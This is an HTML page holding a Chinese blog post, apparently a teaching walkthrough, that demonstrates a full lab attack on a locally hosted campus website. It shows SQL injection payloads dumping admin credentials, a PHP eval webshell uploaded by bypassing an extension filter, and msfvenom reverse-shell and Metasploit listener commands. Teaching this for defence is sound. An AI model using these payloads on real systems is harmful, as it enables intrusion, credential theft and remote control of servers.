<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>模拟网站攻击到提权的全部过程 | dota_st</title><meta name="keywords" content="渗透"><meta name="author" content="dota_st"><meta name="copyright" content="dota_st"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><meta name="description" content="前言 今天去给新一届的学生演示一次网站拿webshell到系统提权的过程，但不幸的是中间翻车了，老年人紧张得忘记了msf监听木马的指令，然后哆哆嗦嗦的在大家眼下，打开了笔记查看一下2333…所以更新一下博客，给自己一个教训QWQ。 准备工作 靶机（被攻击方）：win7系统 入侵者（攻击方）：win10系统、kali系统 首先启动win7系统，搭建一个常见的校园网站，然后映射到局域网，使得我们能正常"><meta property="og:type" content="article"><meta property="og:title" content="模拟网站攻击到提权的全部过程"><meta property="og:url" content="https://www.wlhhlc.top/posts/46463/index.html"><meta property="og:site_name" content="dota_st"><meta property="og:description" content="前言 今天去给新一届的学生演示一次网站拿webshell到系统提权的过程，但不幸的是中间翻车了，老年人紧张得忘记了msf监听木马的指令，然后哆哆嗦嗦的在大家眼下，打开了笔记查看一下2333…所以更新一下博客，给自己一个教训QWQ。 准备工作 靶机（被攻击方）：win7系统 入侵者（攻击方）：win10系统、kali系统 首先启动win7系统，搭建一个常见的校园网站，然后映射到局域网，使得我们能正常"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/222.jpg"><meta property="article:published_time" content="2020-12-18T15:19:44.000Z"><meta property="article:modified_time" content="2022-02-13T16:38:04.000Z"><meta property="article:author" content="dota_st"><meta property="article:tag" content="渗透"><meta name="twitter:card" content="summary"><meta name="twitter:image" content="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/222.jpg"><link rel="shortcut icon" href="https://cdn.jsdelivr.net/gh/dota-st/blog_file/E595997D44EF7013BFD08323A4506527.png"><link rel="canonical" href="https://www.wlhhlc.top/posts/46463/"><link rel="preconnect" href="//cdn.jsdelivr.net"><link rel="preconnect" href="//busuanzi.ibruce.info"><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '5.2.0',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容：${query}"}},
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  ClickShowText: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE={isPost:!0,isHome:!1,isHighlightShrink:!1,isSidebar:!0,postUpdate:"2022-02-14 00:38:04"}</script><noscript><style type="text/css">#nav{opacity:1}.justified-gallery img{opacity:1}#post-meta time,#recent-posts time{display:inline!important}</style></noscript><script>(function () {
  window.activateDarkMode = function () {
    document.documentElement.setAttribute('data-theme', 'dark')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
    }
  }
  window.activateLightMode = function () {
    document.documentElement.setAttribute('data-theme', 'light')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
    }
  }

  const autoChangeMode = 'false'
  const t = saveToLocal.get('theme')
  if (autoChangeMode === '1') {
    const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
    const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
    const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
    const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

    if (t === undefined) {
      if (isLightMode) activateLightMode()
      else if (isDarkMode) activateDarkMode()
      else if (isNotSpecified || hasNoSupport) {
        const now = new Date()
        const hour = now.getHours()
        const isNight = hour <= 6 || hour >= 18
        isNight ? activateDarkMode() : activateLightMode()
      }
      window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
        if (saveToLocal.get('theme') === undefined) {
          e.matches ? activateDarkMode() : activateLightMode()
        }
      })
    } else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else if (autoChangeMode === '2') {
    const now = new Date()
    const hour = now.getHours()
    const isNight = hour <= 6 || hour >= 18
    if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
    else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else {
    if (t === 'dark') activateDarkMode()
    else if (t === 'light') activateLightMode()
  }
})()</script><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/dota-st/blog_file/background.min.css"><meta name="referrer" content="no-referrer-when-downgrade"><link rel="stylesheet" href="/css/tag-diy.css"><meta name="generator" content="Hexo 5.2.0"></head><body><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/GamerNoTitle/Picture-repo-v1@master/css/APlayer.min.css"><div id="aplayer"></div><script src="https://cdn.jsdelivr.net/gh/GamerNoTitle/Picture-repo-v1@master/js/APlayer.min.js"></script><div id="loading-box"><div class="loading-left-bg"></div><div class="loading-right-bg"></div><div class="spinner-box"><div class="configure-border-1"><div class="configure-core"></div></div><div class="configure-border-2"><div class="configure-core"></div></div><div class="loading-word">加载中...</div></div></div><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="https://blog-file-1302856486.file.myqcloud.com/%E5%A4%B4%E5%83%8F.png" onerror='onerror=null,src="/img/friend_404.gif"' alt="avatar"></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">21</div></a></div></div><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">6</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i> <span>首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i> <span>时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i> <span>标签</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i> <span>友链</span></a></div><div class="menus_item"><a class="site-page" href="/tools/"><i class="fa-fw fas fa-tools"></i> <span>工具</span></a></div><div class="menus_item"><a class="site-page" href="/messageboard/"><i class="fa-fw fa fa-paper-plane"></i> <span>留言板</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i> <span>关于我</span></a></div></div></div></div><div id="body-wrap"><div id="web_bg"></div><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">2.</span> <span class="toc-text">准备工作</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">3.</span> <span class="toc-text">从网站拿到webshell</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"><span class="toc-number">3.1.</span> <span class="toc-text">sql注入漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E"><span class="toc-number">3.2.</span> <span class="toc-text">文件上传漏洞</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">4.</span> <span class="toc-text">反弹shell连接</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">5.</span> <span class="toc-text">结语</span></a></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image:url(https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/222.jpg)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">dota_st</a></span><span id="menus"><div id="search_button"><a class="site-page social-icon search"><i class="fas fa-search fa-fw"></i> <span>搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i> <span>首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i> <span>时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i> <span>标签</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i> <span>友链</span></a></div><div class="menus_item"><a class="site-page" href="/tools/"><i class="fa-fw fas fa-tools"></i> <span>工具</span></a></div><div class="menus_item"><a class="site-page" href="/messageboard/"><i class="fa-fw fa fa-paper-plane"></i> <span>留言板</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i> <span>关于我</span></a></div></div><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">模拟网站攻击到提权的全部过程</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2020-12-18T15:19:44.000Z" title="发表于 2020-12-18 23:19:44">2020-12-18</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-02-13T16:38:04.000Z" title="更新于 2022-02-14 00:38:04">2022-02-14</time></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">1.7k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>5分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h1>前言</h1><p>今天去给新一届的学生演示一次网站拿webshell到系统提权的过程，但不幸的是中间翻车了，老年人紧张得忘记了msf监听木马的指令，然后哆哆嗦嗦的在大家眼下，打开了笔记查看一下2333…所以更新一下博客，给自己一个教训QWQ。</p><h1>准备工作</h1><p>靶机（被攻击方）：win7系统<br> 入侵者（攻击方）：win10系统、kali系统</p><p>首先启动win7系统，搭建一个常见的校园网站，然后映射到局域网，使得我们能正常访问<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/EUAM0%5DFV1UHQ43O%246FPAM11.png" alt=""></p><h1>从网站拿到webshell</h1><h2 id="sql注入漏洞"><a class="header-anchor" href="#sql注入漏洞">¶</a>sql注入漏洞</h2><p>把整个网站浏览完一遍后，我们发现这里的url为?id=10结尾，我们猜测可能是一个sql注入点<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/%24%28BBF9%7B%40%60VK%5DJ5YB59PLDC8.png" alt=""><br> 首先我们在id=10后面加上一个单引号’进行判断<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/%7DR0SQC6%40%25D0%24UCQD%28%7B_JBJB.png" alt=""><br> 这个时候我们发现回显的数据不正常，于是我们再加一个注释符号<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/EY%24%60%7BQF%5BOL_7B%7D1490~0NFR.png" alt=""><br> 发现数据这个时候回显的时候是正常的，到这一步我们已经可以确定这里存在一个sql注入漏洞</p><blockquote><p>原理我们可以简单解释一下<br> 在网站中，我们一般使用数据库存储网站数据，网站和数据库是存在一个交互性。网站所呈现的内容是由代码中写入的sql语句调用数据库中的内容进行一个呈现，例如我们刚刚看到的文字。<br> 而sql注入漏洞一般是由于程序员书写的sql语句不规范所导致的安全事件。</p></blockquote><p>例如网站源码中使用如下的sql语句进行查询<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/1T2AQDR%295S%5B5%5D5%28FBQV%29EU3.png" alt=""><br> 给语句结尾的where查询条件加上一个单引号’<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/9YFRLV58FSE9%605E%405%7B3F_%25W.png" alt=""><br> 很显然，我们传入的单引号和前面的单引号闭合，后面只有一个无法成对的单引号，然后报了语法错误。这个时候我们再加上<code>--+</code>注释符号注释掉后面的单引号<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/GSUAC7X6IS9%40_SDTJL%5DO4%60J.png" alt=""><br> 这个时候查询的数据就会正确回显出来。</p><p>原理简单解释了一下之后，我们回到刚刚的网站。<br> 这个时候我们发现存在sql注入漏洞之后，我们就开始进行查询对方网站数据库的数据，找到一些敏感信息，例如管理员的账号密码等等</p><p>首先，我们使用order by语句快速猜解出表中的列数<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/CZATPZQ%249%293I4%5DQCRB%7BR9G3.png" alt=""><br> 发现10列的时候报错，说明不足10列，我们继续缩小范围<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/JT6AZ1LLFZHL%4039EJE8OQ3E.png" alt=""><br> 再查询第8列的时候，发现数据回显正确，说明对方表中含有列数8<br> 我们使用union select 自定义查询测试一下，注意我们这里前面的id=10，要写成id=-10，把这里的查询置空<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/W8%25J%40U4%7D%5BD3HFH%7DNFML%25L_7.png" alt=""><br> 发现会分别回显第三列、第五列和第七列。接下来我们就可以在三、五、七处做做文章</p><p>查询数据库名字：</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">192.168</span><span class="number">.1</span><span class="number">.167</span><span class="operator">/</span>yxlink<span class="operator">/</span>tuku<span class="operator">/</span>images.php?id<span class="operator">=</span><span class="number">-10</span><span class="string">&#x27; union select 1,2,database(),4,5,6,7,8--+</span></span><br></pre></td></tr></table></figure><p><img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/EXY%40U7T%25JGYM6%25%7BD0G%29FZF0.png" alt=""><br> 得到数据库名字：qzn_zuiai</p><p>查询数据库中的表名：</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">192.168</span><span class="number">.1</span><span class="number">.167</span><span class="operator">/</span>yxlink<span class="operator">/</span>tuku<span class="operator">/</span>images.php?id<span class="operator">=</span><span class="number">-10</span><span class="string">&#x27; union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=&quot;qzn_zuiai&quot;--+</span></span><br></pre></td></tr></table></figure><p><img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/64LOR%40WXDA7PCL2%5B8%40OWSJG.png" alt=""><br> 得到一共se2admin,se2fl,se2hd,se2nr,se2tufl,se2tunr,se2wz,se2zf,sj3sk九张表<br> 通过表名，我们猜测se2admin可能是存储管理员账号和密码的表，所以我们先查询这张表中的数据</p><p>查询表se2admin中的字段：</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">192.168</span><span class="number">.1</span><span class="number">.167</span><span class="operator">/</span>yxlink<span class="operator">/</span>tuku<span class="operator">/</span>images.php?id<span class="operator">=</span><span class="number">-10</span><span class="string">&#x27; union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=&quot;se2admin&quot;--+</span></span><br></pre></td></tr></table></figure><p><img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/2%24%60DI0KVJHJM5MK_S%29SZ~%40U.png" alt=""><br> 得到表中的字段值有id，name，pass等，接下来我们查询name和pass的字段值</p><p>查询字段值：</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">192.168</span><span class="number">.1</span><span class="number">.167</span><span class="operator">/</span>yxlink<span class="operator">/</span>tuku<span class="operator">/</span>images.php?id<span class="operator">=</span><span class="number">-10</span><span class="string">&#x27; union select 1,2,name,4,pass,6,7,8 from se2admin--+</span></span><br></pre></td></tr></table></figure><p><img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/DNM1KIWQ3~%29TL03T%408%5D9G%60X.png" alt=""><br> 我们得到管理员账号：admin，管理员账号密码：7fef6171469e80d32c0559f88b377245<br> 很显然密码值是被加密的md5值，所以我们去网上找md5网站进行撞库查询<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/N%29%5DIF%40X%25H%29789%7B~MNS6K0%5BY.png" alt=""><br> 得到管理员密码为：admin888<br> 接下来我们需要查找这个网站的后台地址，我们使用御剑进行一个扫描<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/OV8QOF%25%7D6CVVLGW_5TQ1%5DTN.png" alt=""><br> 御剑爆出了很多敏感地址，我们找到一个admin的目录，可能是后台地址，我们去访问一下<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/HCYIQ8PD4F%7BU5KVUEVY%7D9WG.png" alt=""><br> 输入我们刚刚得到的管理员账号和密码admin:admin888<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/P%40R%7BB8STI811URPWC%25%40GQ81.png" alt=""><br> 这个时候，我们成功进入对方网站后台。</p><h2 id="文件上传漏洞"><a class="header-anchor" href="#文件上传漏洞">¶</a>文件上传漏洞</h2><p>接下来我们再这里找到一个文件上传点<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/A%28GNMR3D%29O%60%29AH3MKVRQ20U.png" alt=""><br> 我们写一个简单的一句话木马</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> @<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;pass&#x27;</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure><p><img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/H6JI8CKP%256M_8%5BFOZ1_VKUS.png" alt=""><br> 考虑到这里可能会对我们上传的文件进行一个后缀限制，例如只能上传jpg或者png图片格式文件等，所以我们把muma.txt改成muma.jpg格式<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/P0S3ZG_4XI%29%7BGX14%25RQRYUA.png" alt=""><br> 我们开启burpsuite，然后点提交，拦截到我们发送的数据包<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/FK_UC_0%25I%40Q~16XJN7%5B%601CQ.png" alt=""><br> 我们把muma.jpg改回php文件类型：muma.php<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/%24%7BRYDZJ0T4EZ%29FABTKYE5%24J.png" alt=""><br> 然后发送数据包<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/CC8K%256%7DFP%7DHA%5B2ZUFJP%5DDGE.png" alt=""><br> ok，已经上传成功，我们去找找我们上传后的路径<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/V8TW%7BRFNJ%40VVQ6ESZK60QYG.png" alt=""><br> 得到我们的上传完整路径为：<code>http://192.168.1.167/yxlink/img/img_3699336993.php</code><br> 我们使用蚁剑进行连接我们上传的木马<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/2_%5DLX62PYEDGHMP%6094SYA%29P.png" alt=""><br> 成功连接，进入到对方服务器<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/QN_%60%5BB%5BTHV18Z1QFL3L%5B9EP.png" alt=""><br> 到此，已成功拿到webshell</p><h1>反弹shell连接</h1><p>接下来我们利用kali的msf制作一个exe类型的反弹型木马</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip LPORT=端口 -f 类型 -o 文件名</span><br></pre></td></tr></table></figure><p><img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/YDU1EFKR~H3D%28U6OD6X%7DZ%25U.png" alt=""><br> 把做好的木马，通过我们蚁剑刚刚连接的webshell进行上传<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/KUOL~L7CL4S%40%60GJXYIUU%295R.png" alt=""><br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/L%25%40S3%5DE_A%40CF3_%251DUDNP%5BS.png" alt=""><br> 上传成功后，我们在kali启动msf<br> <img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/B%7B%40%40%607%604Y~JIBZFXIR4VC7O.png" alt=""></p><p><strong>执行监听</strong></p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/meterpreter/reverse_tcp</span><br><span class="line">set lhost 192.168.1.131</span><br><span class="line">set lport 4444</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure><p><img src="https://blog-file-1302856486.file.myqcloud.com/%E6%A8%A1%E6%8B%9F%E7%BD%91%E7%AB%99%E6%94%BB%E5%87%BB%E5%88%B0%E6%8F%90%E6%9D%83%E7%9A%84%E8%BF%87%E7%A8%8B/9H%28VN~3CT57WQ1%7DL1MUQ_%7DB.png" alt=""><br> 